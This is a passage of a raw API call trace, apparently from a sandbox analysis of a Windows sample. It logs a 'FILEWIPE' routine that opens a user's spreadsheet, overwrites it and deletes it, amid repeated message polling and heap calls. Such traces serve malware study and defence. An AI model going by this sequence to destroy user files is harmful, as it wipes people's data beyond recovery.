wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.553] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.553] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.553] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.554] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.554] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.554] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.554] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.554] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.554] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0032.554] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.554] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.554] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.554] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.554] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.554] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.554] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.555] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.556] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.556] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20ccdd0, ftCreationTime.dwHighDateTime=0x1d5a18a, ftLastAccessTime.dwLowDateTime=0xd381df0, ftLastAccessTime.dwHighDateTime=0x1d55e4a, ftLastWriteTime.dwLowDateTime=0xd381df0, ftLastWriteTime.dwHighDateTime=0x1d55e4a, nFileSizeHigh=0x0, nFileSizeLow=0x72dd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="-pFtJlZNx-ioickwGvw.xlsx", cAlternateFileName="-PFTJL~1.XLS")) returned 0x7c2100 [0032.556] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.556] CharLowerBuffW (in: lpsz="byte[29405]", cchLength=0xb | out: lpsz="byte[29405]") returned 0xb [0032.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.556] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.556] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.556] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.556] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.556] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.556] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.556] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.557] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.557] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.557] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pftjlznx-ioickwgvw.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0032.558] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.558] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.558] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.558] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.558] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.558] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.558] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.558] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.558] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.558] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.558] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.558] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.558] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.559] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.559] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.559] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.559] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.559] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx", lpFilePart=0x0) returned 0x40 [0032.559] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20ccdd0, ftCreationTime.dwHighDateTime=0x1d5a18a, ftLastAccessTime.dwLowDateTime=0xd381df0, ftLastAccessTime.dwHighDateTime=0x1d55e4a, ftLastWriteTime.dwLowDateTime=0x134a1440, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x72dd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="-pFtJlZNx-ioickwGvw.xlsx", cAlternateFileName="-PFTJL~1.XLS")) returned 0x7c2100 [0032.559] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pftjlznx-ioickwgvw.xlsx")) returned 1 [0032.560] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20ccdd0, ftCreationTime.dwHighDateTime=0x1d5a18a, ftLastAccessTime.dwLowDateTime=0xd381df0, ftLastAccessTime.dwHighDateTime=0x1d55e4a, ftLastWriteTime.dwLowDateTime=0x134a1440, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x72dd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="-pFtJlZNx-ioickwGvw.xlsx", cAlternateFileName="-PFTJL~1.XLS")) returned 0 [0032.560] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.561] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.562] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.562] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4f8 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.563] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.563] HeapFree (in: hHeap=0x770000, 